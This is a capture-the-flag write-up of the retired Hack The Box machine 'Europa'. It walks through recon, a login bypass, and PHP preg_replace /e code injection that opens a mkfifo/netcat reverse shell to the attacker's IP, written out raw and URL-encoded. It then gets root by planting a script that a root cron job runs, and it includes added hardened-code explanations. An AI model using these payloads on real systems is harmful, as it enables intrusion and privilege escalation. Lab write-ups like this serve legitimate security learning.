
Hackthebox.eu - Retired - Europa



Recon


As always, I start with a simple up/down scan of all TCP ports.
$ nmap -T4 -p- -oX ./nmapb.xml europa.htb


Then I convert that to HTML to make it pretty
xsltproc ./nmapb.xml -o ./nmapb.html



Ports 22, 80 and 443 are open.

Looks like this box is going to be mostly web-based.

Let's run nmap again with the -A switch (version detection, OS detection and the default scripts) against these three ports

$ nmap -T4 -A -p22,80,443 -oX ./nmapf.xml europa.htb

Then we will convert that output to HTML also
xsltproc ./nmapf.xml -o ./nmapf.html





Looks like we have an Ubuntu box running a fairly new version of OpenSSH on port 22 and Apache 2.4.18 on 80 and 443.


Let's check out those Apache sites

Both are just the default Apache install page

Got a little bit more info from the certificate on 443


europacorp.htb should be the box's hostname.

I ran a bunch of scans against these two domains:
europa.htb
europacorp.htb

Tried dirb and DirBuster and didn't find anything…

Looking back at the nmap results I see this


admin-portal.europacorp.htb

Also in the cert we found this email address

admin@europacorp.htb



Exploit





Woot we got a login page

Tried some generic SQLi here but didn't get anywhere in the browser. The email field's client-side validation wouldn't let me submit anything that wasn't an email address.




What if we try it with Burp to get around that silly client-side validation?


We got a redirect.


We are in.



None of the links on the dashboard are real; they just link back to dashboard.php.

However, there is this Tools section.

It lets a user input an IP address, presumably the IP address of the OpenVPN server, and the tool generates an OpenVPN config file for connecting to the company VPN…

But as an attacker, what do we have here? A way to input some data that the server then processes. Hopefully we can use this to get our foothold.

This is what the request looks like in burp



If we look at the source of the generate form we can see this hidden input



There is a field named pattern with /ip_address/ as the value.

Since that is surrounded by slashes, it makes me think there is a regex involved in the code that generates the config.

There is a fairly well-known deprecated modifier in PHP's preg_replace.



Here is a blog about why this is deprecated.



If we can append /e to the pattern field, then the replacement string (here, whatever we put in the ipaddress field) will be evaluated as PHP code….

So we can use our input to insert PHP code into our request..
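To make the bug concrete, here is a reconstruction of the shape of code the tools page must contain for this to work, beside a hardened version. This is an added illustration, not the box's actual tools.php (which the write-up never shows); the field names come from the Burp request on this page, while the OpenVPN template string is an assumption. The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so the vulnerable function only behaves as described on PHP 5.x; on PHP 7+ preg_replace() rejects the unknown modifier and returns NULL.

```php
<?php
// Added illustration, not the box's real tools.php.
// Assumes the form posts the fields seen in the Burp request: pattern, ipaddress, text.

// Vulnerable shape: the client-supplied pattern, modifiers included, goes straight
// into preg_replace(). With "/e" appended (PHP 5.x only; removed in PHP 7.0) the
// replacement argument is evaluated as PHP, so ipaddress=system('...') executes.
function generate_config_vulnerable(array $post)
{
    return preg_replace($post['pattern'], $post['ipaddress'], $post['text']);
}

// Hardened shape: the server decides what is replaced and how; the client only
// supplies an address, which is validated before it touches the template.
function generate_config_hardened(array $post): string
{
    // Constructed template; the real generator's template is unknown.
    $template = "client\nremote ip_address 1194\nproto udp\n";

    $ip = isset($post['ipaddress']) ? trim((string) $post['ipaddress']) : '';
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
        throw new InvalidArgumentException('ipaddress must be a literal IPv4 address');
    }

    // Plain string replacement: no regex engine, so no modifiers to smuggle in,
    // and the client's 'pattern' and 'text' fields are simply never consulted.
    return str_replace('ip_address', $ip, $template);
}

// Constructed inputs: a benign request and one shaped like the request in the write-up.
$benign  = ['pattern' => '/ip_address/', 'ipaddress' => '10.10.14.42',  'text' => 'remote ip_address 1194'];
$hostile = ['pattern' => '/changed/e',   'ipaddress' => "system('id')", 'text' => 'changed'];

echo generate_config_hardened($benign);
try {
    generate_config_hardened($hostile);
} catch (InvalidArgumentException $e) {
    // The hostile request is rejected before any replacement happens.
    echo "rejected: ", $e->getMessage(), "\n";
}
```

The important design point is that the pattern never comes from the client at all. Validating the modifier string, or stripping a trailing e, would still leave a regex engine processing attacker-chosen input; a fixed template plus a strict IP check removes the whole class of problem, and on PHP 7+ the /e path no longer exists anyway.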


So let's try to ping our VPN IP

So in php that would look like this

system('ping -c 10 10.10.14.42')

For this to work we need to encode the spaces in our command.

We can just put in a + sign for the spaces, since the body is form-encoded.

So it would then look like
system('ping+-c+10+10.10.14.42')

So first let's set up a listener on our

sudo tcpdump -i tun0 -n icmp

So tcpdump on just interface tun0 and only showing ICMP

Here is what I ended up with for my request

pattern=%2Fchanged%2Fe&ipaddress=system('ping+-c+10+10.10.14.42')&text=changed


And my tcpdump output


OK, so the proof of concept works.

Let's try to get a shell

I tried a couple but finally had luck with a mkfifo shell.

So it would start by looking like this

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Then of course we need to edit that for our VPN IP and listener port

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 5555 >/tmp/f
Now we need to URL-encode it

I use this website to do it

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.42%205555%20%3E%2Ftmp%2Ff

Before we try to send this to tools.php we need to set up our listener


$ nc -lnvp 5555

Here is my final request

pattern=%2Fchanged%2Fe&ipaddress=system('rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.42%205555%20%3E%2Ftmp%2Ff')&text=changed

Sent that to tools.php using burp annnnnnnnnddddddddd


We got a shell, we got a shell, we got a shell hey hey hey hey




Poking around the system, we can already get the user flag

in the /home/john folder





I used wget to transfer LinEnum.sh to the Europa box.

I saw this in the output (after I gave it execute rights)




Here is a job that runs every minute as root.. Coool

Let's see what it does

$ cat /var/www/cronjobs/clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

So it blanks out access.log……

But then it calls a script named logcleared.sh in /var/www/cmd/

Let's see what is in that script


Nothing; it doesn't exist, but it looks like we have write access to this folder, so we can make one :)


So I made one with this line


cat /root/root.txt  >> /tmp/circusmonkey/root.txt

Copied it over using wget and my Python SimpleHTTPServer.

Waited a minute.

Then cat'd the file.
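The root cron job above trusts a path under a directory the web user can write to, which is the whole privilege escalation. As an added example (not the script from the box), here is how that clearlogs job could refuse to run a hook that an unprivileged user could have planted: it checks that the file exists, is a regular file owned by root, and that neither it nor its directory is writable by group or others. The paths are the ones shown on this page; the check function name is my own.

```php
#!/usr/bin/php
<?php
// Added illustration of a safer clearlogs job; not the script found on the box.
// The original calls exec('/var/www/cmd/logcleared.sh') unconditionally, and
// /var/www/cmd is writable by the web user, so whoever holds a www-data shell
// gets root to run a file of their choosing every minute.

// True only if $path is a regular file owned by root, and neither it nor its
// parent directory is writable by group or others.
function is_root_owned_and_unwritable(string $path): bool
{
    if (!is_file($path)) {
        return false;                       // missing or not a regular file
    }
    foreach ([$path, dirname($path)] as $p) {
        $st = stat($p);
        if ($st === false || $st['uid'] !== 0) {
            return false;                   // not owned by root
        }
        if (($st['mode'] & 022) !== 0) {
            return false;                   // group- or world-writable
        }
    }
    return true;
}

$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');

$hook = '/var/www/cmd/logcleared.sh';
if (is_root_owned_and_unwritable($hook)) {
    exec(escapeshellarg($hook));
} else {
    // Log and skip rather than execute something an unprivileged user could have planted.
    error_log("clearlogs: not running $hook (missing, not root-owned, or writable by others)");
}
```

The check is a guard, not the real fix. The better design is for a root cron job not to depend on anything under /var/www at all: keep the hook in a root-owned location such as /usr/local/sbin, or run the log rotation as the web user so a planted script gains nothing. Either way, the failure mode shown on this page (hook missing, attacker supplies it) becomes a logged refusal instead of root code execution.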



















